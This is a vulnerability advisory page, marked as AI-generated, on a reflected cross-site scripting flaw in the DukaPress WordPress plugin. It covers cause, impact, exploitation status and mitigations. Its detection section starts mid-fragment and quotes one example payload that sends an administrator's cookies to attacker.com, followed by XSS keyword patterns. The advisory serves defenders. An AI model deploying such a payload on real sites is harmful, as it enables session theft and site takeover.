
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-2466 is a Reflected Cross-Site Scripting (XSS) vulnerability in the DukaPress WordPress plugin affecting all versions through 3.2.4. The flaw allows unauthenticated remote attackers to inject malicious scripts that execute in the context of high-privilege users such as administrators. It was publicly disclosed on February 18, 2026, and assigned a CVSS v3.1 base score of 7.1 (High) by CISA-ADP (WPScan, NVD). The vulnerability was discovered and reported by the Vuln Seeker Cyber Security Team (WPScan).
The root cause is improper input sanitization and output escaping (CWE-79), where a user-supplied parameter is reflected directly into the HTML page response without adequate filtering. An attacker crafts a malicious URL containing a JavaScript payload embedded in the vulnerable parameter; when a privileged user (e.g., an administrator) clicks the link, the script executes in their browser session. The attack vector is network-based, requires no authentication or privileges, but does require user interaction (the victim must follow a crafted link). A proof-of-concept published by WPScan demonstrates exploitation via an HTML form that auto-submits to trigger the reflected payload (WPScan).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of a targeted high-privilege WordPress user, such as an administrator. This can lead to session token theft, unauthorized administrative actions (e.g., creating rogue admin accounts, installing malicious plugins), and potential full site compromise. The scope is changed (S:C in CVSS), meaning the impact extends beyond the vulnerable component to the broader WordPress environment, with low confidentiality, integrity, and availability impacts per the CVSS assessment (NVD, WPScan).
No known active exploitation in the wild has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term (Feedly). A public proof-of-concept is available via WPScan, lowering the barrier for exploitation. No specific threat actor attribution has been identified (WPScan).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).<script>, javascript:, onerror=, onload=) in query parameters; outbound requests from admin browsers to unknown external domains shortly after plugin page access.As of the disclosure date, there is no known fix available for the DukaPress plugin — the WPScan advisory explicitly states "No known fix" (WPScan). Site administrators should consider deactivating and removing the DukaPress plugin until a patched version is released. As a compensating control, implement a Web Application Firewall (WAF) with XSS filtering rules, restrict access to WordPress admin areas by IP, and educate administrators to avoid clicking unsolicited links. Monitor the WPScan vulnerability database and the plugin's repository for patch availability.
Wordfence included CVE-2026-2466 in its weekly WordPress vulnerability report for the period of March 9–15, 2026, highlighting it among other plugin vulnerabilities (Wordfence). The vulnerability received standard aggregation coverage across vulnerability databases (NVD, ENISA EUVD, VulnDB) and automated social media posts, but no notable independent researcher commentary or significant community discussion has been identified beyond routine disclosure tracking.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."